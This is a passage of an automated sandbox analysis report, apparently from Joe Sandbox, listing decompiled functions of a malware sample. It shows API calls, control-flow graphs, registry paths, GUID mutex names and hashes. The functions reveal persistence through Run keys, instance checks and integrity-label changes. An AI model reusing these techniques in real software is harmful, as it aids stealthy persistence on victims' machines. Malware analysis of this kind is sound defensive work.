                                                                                                              • Part of subcall function 00310400: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 003104DE
                                                                                                            • CreateDirectoryW.KERNELBASE(?,0000000C), ref: 0030FF9E
                                                                                                            • GetLastError.KERNEL32 ref: 0030FFA9
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030FFBA
                                                                                                            • LocalFree.KERNELBASE(?), ref: 0030FFC4
                                                                                                            • CoTaskMemFree.COMBASE(00371178), ref: 0030FFCE
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030FFE5
                                                                                                            • CoTaskMemFree.COMBASE(00371178), ref: 0030FFF9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeLocal$AllocDescriptorInitializeSecurityTask$AllocateCreateDaclDirectoryEntriesErrorFolderKnownLastPath_memsetwnsprintf
                                                                                                            • String ID: %s\%s
                                                                                                            • API String ID: 4260852628-4073750446
                                                                                                            • Opcode ID: 3b02d7a948223fbfe3af0eb5461e221f849ebe60cbd470944ab9fa6849c641ab
                                                                                                            • Instruction ID: a01d5f45373c6d5515db0ee171313bf7d9924bf8055e902ea70e464b45909571
                                                                                                            • Opcode Fuzzy Hash: 3b02d7a948223fbfe3af0eb5461e221f849ebe60cbd470944ab9fa6849c641ab
                                                                                                            • Instruction Fuzzy Hash: 39211074900209EFDB25DFA8DC89BEEBB79AF48305F108468F605E6690C7749A80CB51
                                                                                                            Function 003143D0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 62registrystringCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 709 3143d0-31440e call 323520 GetModuleFileNameW 712 314414-314454 call 32359a RegOpenKeyExW 709->712 713 3144aa 709->713 712->713 717 314456-314487 lstrlenW RegSetValueExW 712->717 715 3144ac-3144af 713->715 718 314489-31449b RegCloseKey 717->718 719 31449d-3144a4 RegCloseKey 717->719 718->715 719->713
                                                                                                            APIs
                                                                                                            • _memset.LIBCMT ref: 003143F0
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00314406
                                                                                                            • __snwprintf.LIBCMT ref: 0031442A
                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000102,?), ref: 0031444C
                                                                                                            • lstrlenW.KERNEL32(?), ref: 0031445D
                                                                                                            • RegSetValueExW.KERNELBASE(?,{C3120582-398C-4F3B-A956-7E9F9DB9EF8E},00000000,00000001,?,00000002), ref: 0031447F
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00314490
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 003144A4
                                                                                                            Strings
                                                                                                            • SOFTWARE\%s, xrefs: 00314419
                                                                                                            • {C3120582-398C-4F3B-A956-7E9F9DB9EF8E}, xrefs: 00314473
                                                                                                            • {BB52E685-57DB-490D-A4DD-CCF2F7D90D58}, xrefs: 00314414
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Close$FileModuleNameOpenValue__snwprintf_memsetlstrlen
                                                                                                            • String ID: SOFTWARE\%s${BB52E685-57DB-490D-A4DD-CCF2F7D90D58}${C3120582-398C-4F3B-A956-7E9F9DB9EF8E}
                                                                                                            • API String ID: 1214033602-3858757917
                                                                                                            • Opcode ID: ac2a54b355484fa511c37f8450dbe98c0de13729269eff0e26f51a2bb99971ed
                                                                                                            • Instruction ID: f9f09ad1b1ca838de47a82928f1be29a4878ce8c3de5a5712f86bba919a5e317
                                                                                                            • Opcode Fuzzy Hash: ac2a54b355484fa511c37f8450dbe98c0de13729269eff0e26f51a2bb99971ed
                                                                                                            • Instruction Fuzzy Hash: 351189B5A503146BD735DB60DC4EFEA737C9F48700F104688B61DA6091EAB59AC4CB61
                                                                                                            Function 00312680 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 39registryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 720 312680-31268b 721 31268d-3126a3 RegOpenKeyW 720->721 722 3126be-3126c5 720->722 721->722 723 3126a5-3126b8 RegDeleteValueW RegCloseKey 721->723 724 3126c7-3126dd RegOpenKeyW 722->724 725 3126f8-312700 722->725 723->722 724->725 726 3126df-3126f2 RegDeleteValueW RegCloseKey 724->726 726->725
                                                                                                            APIs
                                                                                                            • RegOpenKeyW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 0031269B
                                                                                                            • RegDeleteValueW.ADVAPI32(?,00376FC8,?,?,00301109), ref: 003126AE
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,00301109), ref: 003126B8
                                                                                                            • RegOpenKeyW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,?), ref: 003126D5
                                                                                                            • RegDeleteValueW.KERNELBASE(?,{AB1F3E47-AEF1-400E-A108-233A046C3A34},?,?,00301109), ref: 003126E8
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,00301109), ref: 003126F2
                                                                                                            Strings
                                                                                                            • {AB1F3E47-AEF1-400E-A108-233A046C3A34}, xrefs: 003126DF
                                                                                                            • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00312691
                                                                                                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 003126CB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseDeleteOpenValue
                                                                                                            • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Run$Software\Microsoft\Windows\CurrentVersion\Run${AB1F3E47-AEF1-400E-A108-233A046C3A34}
                                                                                                            • API String ID: 849931509-2070010218
                                                                                                            • Opcode ID: c637dd80f35a4496a6ce9611896cb8e7d4144c16a70478508f276c55fd01f0ff
                                                                                                            • Instruction ID: 1814358130b0a08cce8824478a7cfd5dfa777c285bdc9cdd21d72f6deb7bac9e
                                                                                                            • Opcode Fuzzy Hash: c637dd80f35a4496a6ce9611896cb8e7d4144c16a70478508f276c55fd01f0ff
                                                                                                            • Instruction Fuzzy Hash: 26013175700204FBD736DBA0EE49EAE777CEB08701F104158F909A2150DAB2EAD1AB65
                                                                                                            Function 0030B510 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 43registryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 742 30b510-30b54f call 32359a RegOpenKeyW 745 30b551-30b553 742->745 746 30b555-30b570 RegSetValueExW 742->746 747 30b58f-30b592 745->747 748 30b580-30b58a RegCloseKey 746->748 749 30b572-30b57e RegCloseKey 746->749 748->747 749->747
                                                                                                            APIs
                                                                                                            • __snwprintf.LIBCMT ref: 0030B52F
                                                                                                            • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 0030B547
                                                                                                            • RegSetValueExW.KERNELBASE(?,{C2FE454F-1649-4C34-B46D-B1EE64A366C2},00000000,00000003,00314285,0000000C), ref: 0030B568
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0030B576
                                                                                                            Strings
                                                                                                            • {C2FE454F-1649-4C34-B46D-B1EE64A366C2}, xrefs: 0030B55F
                                                                                                            • {BB52E685-57DB-490D-A4DD-CCF2F7D90D58}, xrefs: 0030B519
                                                                                                            • SOFTWARE\%s, xrefs: 0030B51E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpenValue__snwprintf
                                                                                                            • String ID: SOFTWARE\%s${BB52E685-57DB-490D-A4DD-CCF2F7D90D58}${C2FE454F-1649-4C34-B46D-B1EE64A366C2}
                                                                                                            • API String ID: 2100281157-3270428146
                                                                                                            • Opcode ID: 8acd320f70d89cacf14901c2584e0e79e932baae78cad9cfc89c74019efb003d
                                                                                                            • Instruction ID: c8d9841e402f2373fb03bfb7cdc8e8289c9da0661669def7e3066b4941db0c9d
                                                                                                            • Opcode Fuzzy Hash: 8acd320f70d89cacf14901c2584e0e79e932baae78cad9cfc89c74019efb003d
                                                                                                            • Instruction Fuzzy Hash: 4A01317574420CBBD722DBA0DC59FAE737CAB49700F104994B609AA1C0EA76DB44A7A1
                                                                                                            Function 00301900 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62synchronizationCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 750 301900-301909 751 30190f-30191b 750->751 752 301921-301928 751->752 753 301c0f 751->753 754 30192a-30195b call 310ca0 752->754 755 30195d-301999 call 3138d0 752->755 757 301c14-301c20 call 30fac0 753->757 758 3018f4-3018fe 753->758 764 30199f-3019a6 754->764 755->764 768 301c31-301c39 call 31c1e0 757->768 769 301c22-301c2b WaitForSingleObject 757->769 758->751 766 3019ac-3019b3 764->766 767 301bff-301c04 Sleep 764->767 770 3019b9-3019c7 766->770 771 301b3f-301b90 WaitForMultipleObjects WaitForSingleObject 766->771 772 301c0a 767->772 779 301c48-301c4a ExitProcess 768->779 780 301c3b-301c42 Wow64DisableWow64FsRedirection 768->780 769->768 775 301a37-301a45 770->775 776 3019c9-3019dd WaitForSingleObject 770->776 777 301b92-301b99 771->777 778 301b9b-301ba2 771->778 772->753 782 301ab6-301ac4 775->782 783 301a47-301a5b WaitForSingleObject 775->783 776->775 781 3019df-3019fe OpenMutexW 776->781 777->753 784 301bb3-301bba 778->784 785 301ba4-301bad TerminateProcess 778->785 780->779 790 301a00-301a13 WaitForSingleObject 781->790 791 301a21-301a28 781->791 788 301b35 782->788 789 301ac6-301ada WaitForSingleObject 782->789 783->782 792 301a5d-301a7c OpenMutexW 783->792 786 301bc9-301bd0 784->786 787 301bbc-301bc3 CloseHandle 784->787 785->784 793 301bd2-301bd9 CloseHandle 786->793 794 301bdf-301bfd call 323520 Sleep 786->794 787->786 788->757 789->788 795 301adc-301afb OpenMutexW 789->795 796 301a15 790->796 797 301a1f 790->797 791->775 798 301a2a-301a31 CloseHandle 791->798 799 301aa0-301aa7 792->799 800 301a7e-301a92 WaitForSingleObject 792->800 793->794 794->772 803 301afd-301b11 WaitForSingleObject 795->803 804 301b1f-301b26 795->804 796->757 797->776 798->775 799->782 801 301aa9-301ab0 CloseHandle 799->801 805 301a94 800->805 806 301a9e 800->806 801->782 808 301b13 803->808 809 301b1d 803->809 804->788 810 301b28-301b2f CloseHandle 804->810 805->757 806->783 808->757 809->789 810->788
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 003019D2
                                                                                                            • OpenMutexW.KERNEL32(00100000,00000000,{6B55C48E-8FCD-482F-91CF-9C0B3FD8AC2B}), ref: 003019EB
                                                                                                            • WaitForSingleObject.KERNEL32(000002EC,0000000A), ref: 00301A08
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00301C2B
                                                                                                            • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00301C42
                                                                                                            • ExitProcess.KERNEL32 ref: 00301C4A
                                                                                                            Strings
                                                                                                            • {6B55C48E-8FCD-482F-91CF-9C0B3FD8AC2B}, xrefs: 003019DF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ObjectSingleWait$Wow64$DisableExitMutexOpenProcessRedirection
                                                                                                            • String ID: {6B55C48E-8FCD-482F-91CF-9C0B3FD8AC2B}
                                                                                                            • API String ID: 3042449743-1168154662
                                                                                                            • Opcode ID: 91aaada249ad37d83718ed419d3b50560b4dd2983b495c2c7f04d1ac3d7cf9d8
                                                                                                            • Instruction ID: db5bdcf1fb0c4d0753df0815690c54c3c6ddd9ba4b604a185c6a7bc44cae3eb4
                                                                                                            • Opcode Fuzzy Hash: 91aaada249ad37d83718ed419d3b50560b4dd2983b495c2c7f04d1ac3d7cf9d8
                                                                                                            • Instruction Fuzzy Hash: A7219DB0A41214CFDB36DB54EDE8BD873BEAB88304F2041A9E20DA6191CBB499C0CF11
                                                                                                            Function 0031C570 Relevance: 10.6, APIs: 7, Instructions: 62filememoryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 811 31c570-31c599 CreateFileW 812 31c614 811->812 813 31c59b-31c5ae GetFileSize 811->813 814 31c616-31c619 812->814 815 31c5b0-31c5c3 LocalAlloc 813->815 816 31c60a-31c60e CloseHandle 813->816 815->816 817 31c5c5-31c5df ReadFile 815->817 816->812 818 31c5e1-31c5e7 817->818 819 31c600-31c604 LocalFree 817->819 818->819 820 31c5e9-31c5fe CloseHandle 818->820 819->816 820->814
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,?,0031430B,?,00000000), ref: 0031C58C
                                                                                                            • GetFileSize.KERNEL32(000000FF,00000000,?,0031430B,?), ref: 0031C5A1
                                                                                                            • LocalAlloc.KERNELBASE(00000040,000000FF,?,0031430B), ref: 0031C5B6
                                                                                                            • ReadFile.KERNELBASE(000000FF,00000000,000000FF,?,00000000), ref: 0031C5D7
                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 0031C5ED
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031C604
                                                                                                            • CloseHandle.KERNEL32(000000FF,?,0031430B), ref: 0031C60E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseHandleLocal$AllocCreateFreeReadSize
                                                                                                            • String ID:
                                                                                                            • API String ID: 2550598358-0
                                                                                                            • Opcode ID: ffb0bafd365a78fe22e54814b74c7dec8ad05f4536b63a8e1170b50d37d46297
                                                                                                            • Instruction ID: a127ef8410f7f848ae309b82703406b24ab6c8fd38ddc83bd301364c6bf67a93
                                                                                                            • Opcode Fuzzy Hash: ffb0bafd365a78fe22e54814b74c7dec8ad05f4536b63a8e1170b50d37d46297
                                                                                                            • Instruction Fuzzy Hash: A9210674A40208FBDB19DFA4D989FAEB779BB48701F108688F615A7290D734AA85CF50
                                                                                                            Function 0031C4B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NW;;;LW),00000001,00000000,00000000), ref: 0031C4E6
                                                                                                            • GetSecurityDescriptorSacl.ADVAPI32(00000000,00000000,00000000,00000000), ref: 0031C500
                                                                                                            • SetNamedSecurityInfoW.ADVAPI32(00000000,00000006,00000010,00000000,00000000,00000000,00000000), ref: 0031C51C
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031C529
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Security$Descriptor$ConvertFreeInfoLocalNamedSaclString
                                                                                                            • String ID: S:(ML;;NW;;;LW)
                                                                                                            • API String ID: 173816248-495562761
                                                                                                            • Opcode ID: 1d0e66de9a9d2c2434c1c15403a38ff1c0cfb9f7886c1d04c6ca158a3edaccbe
                                                                                                            • Instruction ID: a75b4941014e2877a1a9b052e30494f0796f393cd1ca0c6c7481dfd3a438eaff
                                                                                                            • Opcode Fuzzy Hash: 1d0e66de9a9d2c2434c1c15403a38ff1c0cfb9f7886c1d04c6ca158a3edaccbe
                                                                                                            • Instruction Fuzzy Hash: 95015EB1A40308ABEB21CFD0CD45FEFB7BDAB08704F104548E605AA1C0D7B5AA44CFA1
                                                                                                            Function 0030B4A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30registryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 826 30b4a0-30b4f3 call 32359a RegGetValueW 829 30b4f5-30b4fa 826->829 830 30b4fe 826->830 831 30b500-30b503 829->831 830->831
                                                                                                            APIs
                                                                                                            • __snwprintf.LIBCMT ref: 0030B4BF
                                                                                                            • RegGetValueW.KERNELBASE(80000001,?,{C2FE454F-1649-4C34-B46D-B1EE64A366C2},00000008,00000000,00314257,0000000C), ref: 0030B4EB
                                                                                                            Strings
                                                                                                            • {C2FE454F-1649-4C34-B46D-B1EE64A366C2}, xrefs: 0030B4DA
                                                                                                            • SOFTWARE\%s, xrefs: 0030B4AE
                                                                                                            • {BB52E685-57DB-490D-A4DD-CCF2F7D90D58}, xrefs: 0030B4A9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Value__snwprintf
                                                                                                            • String ID: SOFTWARE\%s${BB52E685-57DB-490D-A4DD-CCF2F7D90D58}${C2FE454F-1649-4C34-B46D-B1EE64A366C2}
                                                                                                            • API String ID: 3635966236-3270428146
                                                                                                            • Opcode ID: d01c1bf29b31e80ad8420e0914912b3f295971d9b1ae295c6256907a7d3feb02
                                                                                                            • Instruction ID: fec7daccf55c1833676404a13528784adeecfda1d134a734c2a484cd06d2f830
                                                                                                            • Opcode Fuzzy Hash: d01c1bf29b31e80ad8420e0914912b3f295971d9b1ae295c6256907a7d3feb02
                                                                                                            • Instruction Fuzzy Hash: F1F0EC3174420CB6E721D7A5DC4BFFAB36CA704700F108194B90C961C0E6B59B4557D1
                                                                                                            Function 00305CC0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 222COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _malloc
                                                                                                            • String ID: LdrGetProcedureAddress
                                                                                                            • API String ID: 1579825452-3058439150
                                                                                                            • Opcode ID: 09c78cc6a4e8364987b1b45a530da1334eac5751038379abed5a649912e75966
                                                                                                            • Instruction ID: 49f890372204ef2a73e1c180ac4a85a7add8b0f3acc9e2e7c5663ebc72454086
                                                                                                            • Opcode Fuzzy Hash: 09c78cc6a4e8364987b1b45a530da1334eac5751038379abed5a649912e75966
                                                                                                            • Instruction Fuzzy Hash: 0EA12970D02218DFDB25DB98CDA5BEFB7B5BB48314F148298E00A6B285DB356E85CF50
                                                                                                            Function 0031CD20 Relevance: 5.0, APIs: 4, Instructions: 49memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNELBASE(00000040,00005004), ref: 0031CD2D
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 0031CD57
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031CD94
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031CD9E
                                                                                                            Memory Dump Source
